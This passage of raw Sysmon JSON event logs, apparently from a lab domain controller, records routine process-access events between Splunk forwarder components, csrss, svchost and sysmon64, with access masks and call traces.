C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001095160500}","TargetProcessId":"2272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3796,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-001095160500}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-001095160500}","TargetProcessId":"2272","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3797,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3798,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.861","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.861\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 